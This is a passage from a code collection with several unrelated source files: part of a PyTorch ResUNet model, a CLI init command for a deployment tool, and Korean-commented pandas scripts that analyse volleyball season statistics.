def __init__(self, num_in_layers, num_out_layers, kernel_size, stride, linear_output=False):
super(conv, self).__init__()
self.kernel_size = kernel_size
self.conv_base = nn.Conv2d(num_in_layers, num_out_layers, kernel_size=kernel_size, stride=stride)
self.normalize = nn.BatchNorm2d(num_out_layers)
self.linear_output = linear_output
def forward(self, x):
p = int(np.floor((self.kernel_size - 1) / 2))
p2d = (p, p, p, p)
x = self.conv_base(F.pad(x, p2d))
if self.linear_output:
return x
x = self.normalize(x)
return F.elu(x, inplace=True)
class upconv(nn.Module):
def __init__(self, num_in_layers, num_out_layers, kernel_size, scale):
super(upconv, self).__init__()
self.scale = scale
self.conv1 = conv(num_in_layers, num_out_layers, kernel_size, 1)
def forward(self, x):
x = nn.functional.interpolate(x, scale_factor=self.scale, mode='bilinear', align_corners=True)
return self.conv1(x)
class ResUNet(nn.Module):
def __init__(self, encoder='resnet50', pretrained=True, num_in_layers=4, num_out_layers=2, linear_output=False):
super(ResUNet, self).__init__()
self.pretrained = pretrained
assert encoder in ['resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152'], "Incorrect encoder type"
if encoder in ['resnet18', 'resnet34']:
filters = [64, 128, 256, 512]
else:
filters = [256, 512, 1024, 2048]
resnet = class_for_name("torchvision.models", encoder)(pretrained=pretrained)
if num_in_layers != 3: # Number of input channels
self.firstconv = nn.Conv2d(num_in_layers, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
else:
self.firstconv = resnet.conv1 # H/2
self.firstbn = resnet.bn1
self.firstrelu = resnet.relu
self.firstmaxpool = resnet.maxpool # H/4
# encoder
self.encoder1 = resnet.layer1 # H/4
self.encoder2 = resnet.layer2 # H/8
self.encoder3 = resnet.layer3 # H/16
# decoder
self.upconv4 = upconv(filters[2], 512, 3, 2)
self.iconv4 = conv(filters[1] + 512, 512, 3, 1)
self.upconv3 = upconv(512, 256, 3, 2)
self.iconv3 = conv(filters[0] + 256, 256, 3, 1)
self.outconv = conv(256, num_out_layers, 1, 1, linear_output=linear_output)
# self.outconv = conv(256, num_out_layers, 1, 1
def skipconnect(self, x1, x2):
diffY = x2.size()[2] - x1.size()[2]
diffX = x2.size()[3] - x1.size()[3]
x1 = F.pad(x1, (diffX // 2, diffX - diffX // 2,
diffY // 2, diffY - diffY // 2))
# for padding issues, see
# https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a
# https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd
x = torch.cat([x2, x1], dim=1)
return x
def forward(self, x, return_ft=False):
# encoding
x1 = self.firstconv(x)
x1 = self.firstbn(x1)
x1 = self.firstrelu(x1)
x1 = self.firstmaxpool(x1)
x2 = self.encoder1(x1)
x3 = self.encoder2(x2)
x4 = self.encoder3(x3)
# decoding
x = self.upconv4(x4)
x = self.skipconnect(x3, x)
x = self.iconv4(x)
x = self.upconv3(x)
x = self.skipconnect(x2, x)
ft = self.iconv3(x)
x = self.outconv(ft)
if return_ft:
return x, ft
else:
return x
``` |
{
"source": "Jinsung-L/sit",
"score": 2
} |
#### File: sitmango/scripts/init.py
```python
import click
from pathlib import Path
import shutil
import json
import re
from .utils import render_template
@click.command()
@click.option('--debug/--no-debug', default=False)
@click.pass_context
def init(ctx, debug):
"""Initiate sit project on current folder."""
DEBUG = ctx.obj['DEBUG'] or debug
MODULE_PATH = ctx.obj['MODULE_PATH']
PROJECT_PATH = Path('.')
PROJECT_NAME = PROJECT_PATH.resolve().name
# Check if there is package.
if not (PROJECT_PATH / 'setup.py').is_file():
click.echo(click.style('ERROR: ', 'red')+"There is no python package found in this directory.")
ctx.exit()
# Check if project initiated
SIT_PATH = PROJECT_PATH / '.sit'
if SIT_PATH.is_dir():
# Load config
with open(SIT_PATH / 'config.json') as file:
SIT_CONFIG = json.load(file)
# Check if remote server is set up
if SIT_CONFIG['remote_setup']:
click.confirm('Remote server is already set up. Do you want to proceed it anyway?', abort=True)
REMOTE_ADDRESS = click.prompt('Remote server address', type=str)
REMOTE_USER = click.prompt('Remote user', type=str)
# Create .sit directory
SIT_PATH = PROJECT_PATH / '.sit'
SIT_PATH.mkdir(parents=True, exist_ok=True)
# Create config.json
config = {
'remote_address': REMOTE_ADDRESS,
'remote_username': REMOTE_USER,
'remote_project_path': '/home/{}/sit/{}'.format(REMOTE_USER, PROJECT_NAME),
'remote_setup': False,
# TODO: Update this to 'localhost' after support of nginx
'gunicorn_host': '0.0.0.0',
'gunicorn_port': 8000,
'gunicorn_user': REMOTE_USER,
'gunicorn_group': REMOTE_USER,
'server_name': '',
}
CONFIG_PATH = SIT_PATH / 'config.json'
with open(str(CONFIG_PATH), 'w') as file:
json.dump(config, file, indent=4)
# Copy supervisord.conf
shutil.copyfile(
MODULE_PATH / 'templates/sit/supervisord.conf',
SIT_PATH / 'supervisord.conf'
)
# Append .gitignore
GITIGNORE_PATH = PROJECT_PATH / '.gitignore'
with open(str(GITIGNORE_PATH)) as file:
gitignore = file.read()
if re.search(r'# sit', gitignore) is None:
with open(str(GITIGNORE_PATH), 'a') as file:
file.write("\n# sit\n.sit/\n")
success_message = """
Initiated {sit} for {project_name}
Configuration file is created at {config_path}
You can manually configure this file.
Now you can make your first deployment by running:
{sit_deploy}
Deploys the application to the production server.
This will set up the remote server at the first run.
After then, it'll just deploy your application.""".format(
sit=click.style('sit', 'cyan'),
project_name=click.style(PROJECT_NAME, 'green'),
config_path=click.style(str(CONFIG_PATH), 'green'),
sit_deploy=click.style('sit deploy', 'cyan')
)
click.echo(success_message)
``` |
{
"source": "JinSungYoon/Graduate_work",
"score": 3
} |
#### File: Graduate_work/Analysis/Analysis_Beautifulsoup.py
```python
import csv
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pylab as plt
# matplotlib의 font_manager에서 설정을 변경해주는 방법을 통해 한글을 출력하는 방법
# http://gomguard.tistory.com/172
# 한글 폰트 안 깨지게하기위한 import
import matplotlib.font_manager as fm
# 가져올 폰트 지정
font_location='E:/글꼴/H2GTRE.TTF'
# 폰트 이름 지정
font_name=fm.FontProperties(fname=font_location).get_name()
mpl.rc('font',family=font_name)
# 다른 파일에 있는 파일 불러오기 위한 import
import sys
# 해당 파일을 불러오기 위해서 paht경로 지정하기
sys.path.insert(0,'E:\대학교\졸업\졸업작품\웹크롤링\Webcrwaling and scraping using python')
import kovo_game_data_Beautifulsoup as kovo
# Pandas로 데이터 읽어오기
# utf-8로 인코딩 된 파일 읽어오기
#table=pd.read_csv('서울시 대중교통 수단별 이용 현황.csv',delimiter=',',engine='python',encoding="utf-8")
# EUC-KR로 인코딩 된 파일 읽어오기
#test=pd.read_csv('서울교통공사 2016년 일별 역별 시간대별 승하차인원(1_8호선).csv',engine='python',encoding='EUC-KR')
# 배구 시즌 데이터 불러오기
Season_result=pd.read_csv('E:/대학교/졸업/졸업작품/웹크롤링/Webcrwaling and scraping using python/Season_result.csv',engine='python',encoding='EUC-KR')
#배구 시즌 데이터 인덱스 Date로 재설정하기
Season_result=Season_result.set_index("Date")
# Python에서 SQL문처럼 사용하는 방법 사이트 https://codeburst.io/how-to-rewrite-your-sql-queries-in-pandas-and-more-149d341fc53e
# 한 시즌에서 한국전력의 경기만 불러오기 테이블명.query(해당열조건 |(or) &(and) 해당열조건)
#print(Season_result.query("Home=='한국전력'|Away=='한국전력'"))
# ==================================== 시즌 결과 데이터 7년치 ===========================================================
"""
# 시즌 7년 데이터 불러오기
# 10년치 데이터를 긁어오려고 하였으나 2011년도부터 승점 제도가 도입되었고, 그에따른 플레이오프 진출 규정도 승점제도로 변경되어 7년전 데이터부터 긁어왔다.
MSeason=kovo.MSeason
FSeason=kovo.FSeason
# 플레이오프에 진출여부에 대한 column을 하나 생성한다.
# 플레이오프에 진출하기위한 조건은 남자,여자부 3위 이내 팀은 자동 진출이고 남자부의 경우에만 3위와 4위의 승점이 3점 이내일 경우 플레이오프에 진출한다.
MPlay_off = [ [] for i in range(len(MSeason))]
FPlay_off = [ [] for i in range(len(FSeason))]
for year in range(len(MSeason)):
for rank in range(len(MSeason[year])):
if rank<3:
MPlay_off[year].append(1)
else:
# 2010-2011시즌부터 남자부는 3위와 4위가 승점이 3점 이내로 났을경우 준플레이오프에 진출하게 된다.
if (rank==3 and MSeason[year].iloc[2]["승점"]-MSeason[year].iloc[3]["승점"]<=3):
MPlay_off[year].append(1)
else:
MPlay_off[year].append(0)
for year in range(len(FSeason)):
for rank in range(len(FSeason[year])):
if rank<3:
FPlay_off[year].append(1)
else:
FPlay_off[year].append(0)
print(Mplay_off)
for loop in range(len(MPlay_off)):
MSeason[loop]["플레이오프_진출"]=MPlay_off[loop]
FSeason[loop]["플레이오프_진출"]=FPlay_off[loop]
MAll_data = []
FAll_data = []
for year in range(len(MSeason)):
for team in range(len(MSeason[year])):
MAll_data.append(MSeason[year].iloc[team])
for year in range(len(FSeason)):
for team in range(len(FSeason[year])):
FAll_data.append(FSeason[year].iloc[team])
Mavg = [ [] for i in range(5) ]
Favg = [ [] for i in range(5) ]
index = 0
for i in range(len(MSeason)):
Mavg[index].append(float(MSeason[i].iloc[2:3]["승점"]))
Favg[index].append(float(FSeason[i].iloc[2:3]["승점"]))
Mavg[index+1].append(float(MSeason[i].iloc[2:3]["승"]))
Favg[index+1].append(float(FSeason[i].iloc[2:3]["승"]))
Mavg[index+2].append(float(MSeason[i].iloc[2:3]["패"]))
Favg[index+2].append(float(FSeason[i].iloc[2:3]["패"]))
Mavg[index+3].append(float(MSeason[i].iloc[2:3]["세트득실률"]))
Favg[index+3].append(float(FSeason[i].iloc[2:3]["세트득실률"]))
Mavg[index+4].append(float(MSeason[i].iloc[2:3]["점수득실률"]))
Favg[index+4].append(float(FSeason[i].iloc[2:3]["점수득실률"]))
def avg(line):
sum=0
for loop in range(len(line)):
sum+=line[loop]
return sum/len(line)
print("남자부 3위 최대 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(max(Mavg[0]),max(Mavg[1]),max(Mavg[2]),max(Mavg[3]),max(Mavg[4])))
print("남자부 3위 평균 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(avg(Mavg[0]),avg(Mavg[1]),avg(Mavg[2]),avg(Mavg[3]),avg(Mavg[4])))
print("남자부 3위 최소 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(min(Mavg[0]),min(Mavg[1]),min(Mavg[2]),min(Mavg[3]),min(Mavg[4])))
print('\n')
print("여자부 3위 최대 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(max(Favg[0]),max(Favg[1]),max(Favg[2]),max(Favg[3]),max(Favg[4])))
print("여자부 3위 평균 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(avg(Favg[0]),avg(Favg[1]),avg(Favg[2]),avg(Favg[3]),avg(Favg[4])))
print("여자부 3위 최소 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(min(Favg[0]),min(Favg[1]),min(Favg[2]),min(Favg[3]),min(Favg[4])))
"""
# ================================ 의사결정나무 연습 =========================================
"""
# http://yamalab.tistory.com/31 <reference>
from sklearn import tree
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
iris = datasets.load_iris()
X = iris.data[:,[2,3]]
Y = iris.target
#print(X)
#print(Y)
# 자동으로 데이터셋을 분리해주는 함수
X_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size=0.3,random_state=0)
# 데이터 표준화 작업
sc = StandardScaler()
sc.fit(X_train)
# 표준화된 데이터셋
X_train_std = sc.transform(X_train)
X_test_std = sc.transform(X_test)
iris_tree = tree.DecisionTreeClassifier(criterion='entropy',max_depth=3,random_state=0)
iris_tree.fit(X_train,Y_train)
# 정확도를 알기 위한 임포트
from sklearn.metrics import accuracy_score
Y_pred_tr = iris_tree.predict(X_test)
print("Accuracy : %.2f"%accuracy_score(Y_test,Y_pred_tr))
#from sklearn.tree import export_graphviz
#import pydotplus
#from IPython.display import Image
#
##from sklearn.tree import export_graphviz
##import pydotplus
##from IPython.display import Image
#
#dot_data = export_graphviz(iris_tree, out_file=None, feature_names=['petal length','petal width'],
# class_names=iris.target_names, filled=True, rounded=True, special_character=True)
#graph = pydotplus.graph_from_dot_data(dot_data)
#Image(graph.create_png())
"""
#===================== 경기에서 각 항목별 성공비율이 경기의 승리와 연관이 있는지 성공비율을 비교(경기 세부데이터)===============================
"""
#===================== 오늘 또 하나의 좋은 삽질을 했다 ㅎㅎㅎㅎㅎ==================================================================================
# 경기에서 각 항목별 성공비율이 경기의 승리와 연관이 있는지 알아보자.
Hframe=kovo.Hframe
Aframe=kovo.Aframe
HScore=Hframe["득점"].sum()
AScore=Aframe["득점"].sum()
HA=Hframe["공격종합"]["성공"].sum()/Hframe["공격종합"]["시도"].sum()
AA=Aframe["공격종합"]["성공"].sum()/Aframe["공격종합"]["시도"].sum()
HO=Hframe["오픈"]["성공"].sum()/Hframe["오픈"]["시도"].sum()
AO=Aframe["오픈"]["성공"].sum()/Aframe["오픈"]["시도"].sum()
HT=Hframe["시간차"]["성공"].sum()/Hframe["시간차"]["시도"].sum()
AT=Aframe["시간차"]["성공"].sum()/Aframe["시간차"]["시도"].sum()
HRear=Hframe["후위"]["성공"].sum()/Hframe["후위"]["시도"].sum()
ARear=Aframe["후위"]["성공"].sum()/Aframe["후위"]["시도"].sum()
HQ=Hframe["속공"]["성공"].sum()/Hframe["속공"]["시도"].sum()
AQ=Aframe["속공"]["성공"].sum()/Aframe["속공"]["시도"].sum()
HQO=Hframe["퀵오픈"]["성공"].sum()/Hframe["퀵오픈"]["시도"].sum()
AQO=Aframe["퀵오픈"]["성공"].sum()/Aframe["퀵오픈"]["시도"].sum()
HServe=Hframe["서브"]["성공"].sum()/Hframe["서브"]["시도"].sum()
AServe=Aframe["서브"]["성공"].sum()/Aframe["서브"]["시도"].sum()
HD=Hframe["디그"]["성공"].sum()/Hframe["디그"]["시도"].sum()
AD=Aframe["디그"]["성공"].sum()/Aframe["디그"]["시도"].sum()
HSet=Hframe["세트"]["성공"].sum()/Hframe["세트"]["시도"].sum()
ASet=Aframe["세트"]["성공"].sum()/Aframe["세트"]["시도"].sum()
HReceive=Hframe["리시브"]["정확"].sum()/Hframe["리시브"]["시도"].sum()
AReceive=Aframe["리시브"]["정확"].sum()/Aframe["리시브"]["시도"].sum()
HBlock=Hframe["블로킹"]["성공"].sum()/Hframe["블로킹"]["시도"].sum()
ABlock=Aframe["블로킹"]["성공"].sum()/Aframe["블로킹"]["시도"].sum()
HE=Hframe["범실"].sum()
AE=Aframe["범실"].sum()
#print("현대캐파탈의 각 항목별 성공률\n 득점 : %2.2f / 공격종합 : %2.2f / 오픈 : %2.2f / 시간차 :%2.2f /\n 후위 : %2.2f / 속공 : %2.2f / 퀵오픈 : %2.2f / 서브 : %2.2f /\n 디그 : %2.2f / 세트 : %2.2f / 리시브 : %2.2f / 블로킹 : %2.2f / 범실 %d"%(HScore,HA,HO,HT,HRear,HQ,HQO,HServe,HD,HSet,HReceive,HBlock,HE))
#print("대한항공의 각 항목별 성공률\n 득점 : %2.2f / 공격종합 : %2.2f / 오픈 : %2.2f / 시간차 :%2.2f /\n 후위 : %2.2f / 속공 : %2.2f / 퀵오픈 : %2.2f / 서브 : %2.2f /\n 디그 : %2.2f / 세트 : %2.2f / 리시브 : %2.2f / 블로킹 : %2.2f / 범실 %d"%(AScore,AA,AO,AT,ARear,AQ,AQO,AServe,AD,ASet,AReceive,ABlock,AE))
# 경기 관련 정보 그래프 그리기
# https://matplotlib.org/examples/pylab_examples/barchart_demo.html 참조
# 내가 표현하고 싶은 데이터
Sky=[HA,HO,HT,HRear,HQ,HQO,HServe,HD,HSet,HReceive,HBlock]
Jumbos=[AA,AO,AT,ARear,AQ,AQO,AServe,AD,ASet,AReceive,ABlock]
fig,ax = plt.subplots() # 그래프를 여러개 표현할때 사용하는것 같다.
height = np.arange(len(Sky)) # y축 높이
bar_width=0.35 # 그래프의 너비
opacity = 0.4
# x축에 들어갈 이름
xlabel = ["공격종합","오픈","시간차","후위공격","속공","퀵오픈","서브","디그","세트","리시브","블로킹"]
# 데이터 bar형태로 표현
Sky_graph=plt.bar(height,Sky,bar_width,
alpha=opacity, # 그래프 불투명도
color='r', # 그래프 색깔
label='현대캐피탈')
# 여기서 그래프를 분리해서 보고 싶다면 y축에 그래프의 너비만큼을 더해줘야 한다.
Jumbos_graph=plt.bar(height+bar_width,Jumbos,bar_width,
alpha=opacity, # 그래프 불투명도
color='b', # 그래프 색깔
label='대한항공')
# x,y축 그래프 이름 설정
plt.xlabel('각 항목')
plt.ylabel('성공률')
plt.title('두 팀의 항목별 성공률 비교')
# x축 항목 이름 지정
plt.xticks(height,xlabel)
plt.legend()
plt.tight_layout()
plt.show()
"""
#==============================================실시간 중계 데이터 분석===============================================================
"""
# 실시간 중계데이터에서 부문별 성공률 정리한 데이터 가져오기
On_air_rate=kovo.Rate_record
On_air_success=kovo.Success_record
# 각 세트의 항목별 성공률 그래프화
for set_num in range(4):
# 각 팀의 세트 데이터 가져오기
Sky_1st = On_air_rate.iloc[set_num]
Jumbos_1st = On_air_rate.iloc[set_num+1]
fig,ax = plt.subplots()
height = np.arange(len(Sky_1st)) # 그래프의 y축 높이
bar_width = 0.4 # 그래프의 너비
opacity = 0.4 #그래프의 불투명도
Home_graph=plt.bar(height,Sky_1st,bar_width,
alpha=opacity,
color='#000000',
label="현대캐피탈"
)
Away_graph=plt.bar(height+bar_width,Jumbos_1st,bar_width,
alpha=opacity,
color='#0000FF',
label="대한항공"
)
# x,y축 그래프 이름 설정
plt.xlabel=('각 항목')
plt.ylabel=('성공률')
plt.title('%d세트 두 팀의 항목별 성공률 비교'%(set_num+1))
# x축 항목 이름 지정
plt.xticks(height,kovo.Scoring_sort)
plt.legend()
plt.tight_layout()
plt.show()
# 각 세트의 성공횟수 그래프 생성
for set_num in range(4):
# 각 팀의 세트 데이터 가져오기
Sky_1st = On_air_success.iloc[set_num]
Jumbos_1st = On_air_success.iloc[set_num+1]
fig,ax = plt.subplots()
height = np.arange(len(Sky_1st))
bar_width = 0.4
opacity = 0.4
# Home팀의 경기 그래프
Home_graph=plt.bar(height,Sky_1st,bar_width,
alpha=opacity,
color='r',
label="현대캐피탈"
)
# Away팀의 경기 그래프
Away_graph=plt.bar(height+bar_width,Jumbos_1st,bar_width,
alpha=opacity,
color='g',
label="대한항공"
)
# x,y축,그래프 이름 설정
plt.xlabel=('각 항목')
plt.ylabel=('성공횟수')
plt.title('%d세트 두 팀의 항목별 성공횟수 비교'%(set_num+1))
# x축 항목 이름 지정
plt.xticks(height,kovo.Scoring_sort)
plt.legend()
plt.tight_layout()
plt.show()
"""
#=====================================연습 데이터========================================================
"""
fruit=pd.DataFrame({
'사과':np.random.randint(100,1000,size=10),
'배':np.random.randint(100,1000,size=10),
'참외':np.random.randint(100,1000,size=10),
'옥수수':np.random.randint(100,1000,size=10),
'고구마':np.random.randint(100,1000,size=10),
'수박':np.random.randint(100,1000,size=10),
'딸기':np.random.randint(100,1000,size=10),
'토마토':np.random.randint(100,1000,size=10),
},
columns=['딸기','토마토','수박','참외','사과','배','옥수수','고구마'],
index=['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct']
)
print(fruit)
fruit.index.name="Month"
# 열 데이터 추가
#fruit["sum"]=fruit.sum(axis=1)
print(len(fruit.columns))
print(len(fruit.index))
# 행 데이터 추가
fruit.loc["Nov"]=np.random.randint(100,1000,size=8)
fruit.loc["Dec"]=np.random.randint(100,1000,size=8)
print(fruit)
# 엑셀파일로 내보내기
fruit.to_csv("fruit.csv",mode='w',encoding='EUC-KR')
"""
#store=pd.read_csv('fruit.csv',engine='python')
# Month를 인덱스롤 재설정
#store=store.set_index("Month")
#print(store)
#store.sum(axis=1).plot(kind="bar")
"""
# 엑셀파일을 읽어옵니다.
f=open('서울시 대중교통 수단별 이용 현황.csv','r',encoding='utf-8')
rdr=csv.reader(f)
# Data에 엑셀 내용 넣기
Data=[]
for line in rdr:
Data.append(line)
# Pandas로 Dataframe에 넣기
#Seoul=pd.DataFrame(Data[1:len(Data)+1],columns=Data[0],index=np.arange(1,len(Data)))
#Seoul=pd.DataFrame(Data[3:len(Data)+1],columns=Data[0][3:13],index=Data[:][2:])
#for loop in range(2,len(Data)):
# print(Data[loop][2:])
#print(Seoul.info())
#print(Seoul)
# iloc는 [행,열]을 적으면 해당 데이터를 긁어온다.
#move=Seoul.iloc[:,3:13].sum(axis=0)
move=[]
# 달 정보 넣기
month=Data[0][3:13]
# map(자료형,data)는 해당 자료를 입력 자료형 형태로 변환해주는 함수이다.
for index in range(1,len(Data)-1):
move.append(list(map(int,Data[index][3:13])))
# Dataframe에서 강제로 문자열을 숫자로 바꾸는 함수
def coerce_df_columns_to_numeric(df, column_list):
df[column_list] = df[column_list].apply(pd.to_numeric, errors='coerce')
coerce_df_columns_to_numeric(Seoul,['1월','2월','3월','4월','5월','6월','7월','8월','9월','10월','11월','12월'])
#월별 지하철 이용객 그래프로 표시
#Seoul.iloc[:,3:13].sum(axis=0).plot(kind="bar")
#Seoul["1월"].plot(kind="bar")
"""
```
#### File: Graduate_work/Analysis/Analysis_selenium.py
```python
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pylab as plt
from collections import Counter
from sklearn import preprocessing
# 한글 폰트 안 깨지게하기위한 import
import matplotlib.font_manager as fm
# 가져올 폰트 지정
font_location='E:/글꼴/H2GTRE.TTF'
# 폰트 이름 지정
font_name=fm.FontProperties(fname=font_location).get_name()
mpl.rc('font',family=font_name)
# 시즌을 count를 할 갯수
count = 10
# 시작 년도
syear = 8
def data_norm(table):
col = table.columns
# 데이터 정규화 과정
x = table[col].values
min_max_scaler = preprocessing.MinMaxScaler()
x_scaled = min_max_scaler.fit_transform(x.astype(float))
table = pd.DataFrame(x_scaled,
columns=col,
index=table.index)
return table
def convert_negative(table,name):
for loop in range(0,len(table.columns)):
if len(table.columns[loop])==2:
if(table.columns[loop][-1]==name):
table[table.columns[loop]] = table[table.columns[loop]]*-1
# =====================================================================7년치 시즌 데이터 ===================================================================
# 플레이오프 진출 요인들 담을 리스트
M_factor_list = [[] for i in range(count)]
F_factor_list = [[] for i in range(count)]
Mcount = []
Fcount = []
Mdata = []
Fdata = []
# 시즌 결과 데이터를 저장한다.
for year in range(syear,18):
kovo_Mresult_table = pd.read_pickle('Kovo_Male_result_table(%s-%s)'%(str(year),str(year+1)))
kovo_Fresult_table = pd.read_pickle('Kovo_Female_result_table(%s-%s)'%(str(year),str(year+1)))
# 플레이오프와 관련없는 순위/팀/경기수/세트수에 대한 데이터 제거
for i in range(7,72):
if i ==7:
if kovo_Mresult_table.columns[i][1]=='순위':
for index in range(i,i+3):
del kovo_Mresult_table[kovo_Mresult_table.columns[i]]
del kovo_Fresult_table[kovo_Fresult_table.columns[i]]
else:
if kovo_Mresult_table.columns[i][1]=='순위':
for index in range(i,i+4):
del kovo_Mresult_table[kovo_Mresult_table.columns[i]]
del kovo_Fresult_table[kovo_Fresult_table.columns[i]]
# 시즌 승패결과를 Season_data를 저장
Season_male_data = pd.read_pickle('Male_Season(%s-%s)'%(str(year),str(year+1)))
Season_female_data = pd.read_pickle('Female_Season(%s-%s)'%(str(year),str(year+1)))
# 시즌의 순위를 남녀 Team_name에 저장한다.
Male_team_name = kovo_Mresult_table.index
Female_team_name = kovo_Fresult_table.index
# 남년 최다연승 최다연패을 저장할 배열을 생성한다.
Male_win_score = np.zeros(len(Male_team_name))
Male_lose_score = np.zeros(len(Male_team_name))
Female_win_score = np.zeros(len(Female_team_name))
Female_lose_score = np.zeros(len(Female_team_name))
win = 0
lose = 0
# 남자팀의 최다 연승 최다 연패를 계산하여 배열에 저장한다.
for team in range(len(Male_team_name)):
for index in range(len(Season_male_data)):
if Season_male_data["홈"][index] == Male_team_name[team] and Season_male_data["승패"][index] == "승" or Season_male_data["상대팀"][index] == Male_team_name[team] and Season_male_data["승패"][index] == "패":
win += 1
lose = 0
if Male_win_score[team] < win:
Male_win_score[team] = win
elif Season_male_data["홈"][index] == Male_team_name[team] and Season_male_data["승패"][index] == "패" or Season_male_data["상대팀"][index] == Male_team_name[team] and Season_male_data["승패"][index] == "승":
lose+=1
win = 0
if Male_lose_score[team] < lose:
Male_lose_score[team] = lose
# 여자팀 최다 연승 최다 연패를 계산하여 저장한다.
for team in range(len(Female_team_name)):
for index in range(len(Season_female_data)):
if Season_female_data["홈"][index] == Female_team_name[team] and Season_female_data["승패"][index] == "승" or Season_female_data["상대팀"][index] == Female_team_name[team] and Season_female_data["승패"][index] == "패":
win += 1
lose = 0
if Female_win_score[team] < win:
Female_win_score[team] = win
elif Season_female_data["홈"][index] == Female_team_name[team] and Season_female_data["승패"][index] == "패" or Season_female_data["상대팀"][index] == Female_team_name[team] and Season_female_data["승패"][index] == "승":
lose+=1
win = 0
if Female_lose_score[team] < lose:
Female_lose_score[team] = lose
Male_attack_efficiency = ((kovo_Mresult_table[('공격', '성공')]-kovo_Mresult_table[('공격', '공격차단')]-kovo_Mresult_table[('공격', '범실')])/kovo_Mresult_table[('공격', '시도')])*100
Female_attack_efficiency = ((kovo_Fresult_table[('공격', '성공')]-kovo_Fresult_table[('공격', '공격차단')]-kovo_Fresult_table[('공격', '범실')])/kovo_Fresult_table[('공격', '시도')])*100
Male_open_attack_efficiency = ((kovo_Mresult_table[('오픈공격', '성공')]-kovo_Mresult_table[('오픈공격', '공격차단')]-kovo_Mresult_table[('오픈공격', '범실')])/kovo_Mresult_table[('오픈공격', '시도')])*100
Female_open_attack_efficiency = ((kovo_Fresult_table[('오픈공격', '성공')]-kovo_Fresult_table[('오픈공격', '공격차단')]-kovo_Fresult_table[('오픈공격', '범실')])/kovo_Fresult_table[('오픈공격', '시도')])*100
Male_time_attack_efficiency = ((kovo_Mresult_table[('시간차공격', '성공')]-kovo_Mresult_table[('시간차공격', '공격차단')]-kovo_Mresult_table[('시간차공격', '범실')])/kovo_Mresult_table[('시간차공격', '시도')])*100
Female_time_attack_efficiency = ((kovo_Fresult_table[('시간차공격', '성공')]-kovo_Fresult_table[('시간차공격', '공격차단')]-kovo_Fresult_table[('시간차공격', '범실')])/kovo_Fresult_table[('시간차공격', '시도')])*100
Male_moving_attack_efficiency = ((kovo_Mresult_table[('이동공격', '성공')]-kovo_Mresult_table[('이동공격', '공격차단')]-kovo_Mresult_table[('이동공격', '범실')])/kovo_Mresult_table[('이동공격', '시도')])*100
Female_moving_attack_efficiency = ((kovo_Fresult_table[('이동공격', '성공')]-kovo_Fresult_table[('이동공격', '공격차단')]-kovo_Fresult_table[('이동공격', '범실')])/kovo_Fresult_table[('이동공격', '시도')])*100
Male_back_attack_efficiency = ((kovo_Mresult_table[('후위공격', '성공')]-kovo_Mresult_table[('후위공격', '공격차단')]-kovo_Mresult_table[('후위공격', '범실')])/kovo_Mresult_table[('후위공격', '시도')])*100
Female_back_attack_efficiency = ((kovo_Fresult_table[('후위공격', '성공')]-kovo_Fresult_table[('후위공격', '공격차단')]-kovo_Fresult_table[('후위공격', '범실')])/kovo_Fresult_table[('후위공격', '시도')])*100
Male_quick_attack_efficiency = ((kovo_Mresult_table[('속공', '성공')]-kovo_Mresult_table[('속공', '공격차단')]-kovo_Mresult_table[('속공', '범실')])/kovo_Mresult_table[('속공', '시도')])*100
Female_quick_attack_efficiency = ((kovo_Fresult_table[('속공', '성공')]-kovo_Fresult_table[('속공', '공격차단')]-kovo_Fresult_table[('속공', '범실')])/kovo_Fresult_table[('속공', '시도')])*100
Male_quick_open_efficiency = ((kovo_Mresult_table[('퀵오픈', '성공')]-kovo_Mresult_table[('퀵오픈', '공격차단')]-kovo_Mresult_table[('퀵오픈', '범실')])/kovo_Mresult_table[('퀵오픈', '시도')])*100
Female_quick_open_efficiency = ((kovo_Fresult_table[('퀵오픈', '성공')]-kovo_Fresult_table[('퀵오픈', '공격차단')]-kovo_Fresult_table[('퀵오픈', '범실')])/kovo_Fresult_table[('퀵오픈', '시도')])*100
Male_serve_efficiency = ((kovo_Mresult_table[('서브', '성공')]-kovo_Mresult_table[('서브', '범실')])/kovo_Mresult_table[('서브', '시도')])*100
Female_serve_efficiency = ((kovo_Fresult_table[('서브', '성공')]-kovo_Fresult_table[('서브', '범실')])/kovo_Fresult_table[('서브', '시도')])*100
Male_blocking_efficiency = ((kovo_Mresult_table[('블로킹', '성공')]+kovo_Mresult_table[('블로킹', '유효블락')]+kovo_Mresult_table[('블로킹', '어시스트')]-kovo_Mresult_table[('블로킹', '범실')]-kovo_Mresult_table[('블로킹', '실패')])/kovo_Mresult_table[('블로킹', '시도')])*100
Female_blocking_efficiency = ((kovo_Fresult_table[('블로킹', '성공')]+kovo_Fresult_table[('블로킹', '유효블락')]+kovo_Fresult_table[('블로킹', '어시스트')]-kovo_Fresult_table[('블로킹', '범실')]-kovo_Fresult_table[('블로킹', '실패')])/kovo_Fresult_table[('블로킹', '시도')])*100
Male_dig_efficiency = ((kovo_Mresult_table[('디그', '성공')]-kovo_Mresult_table[('디그', '실패')]-kovo_Mresult_table[('디그', '범실')])/kovo_Mresult_table[('디그', '시도')])*100
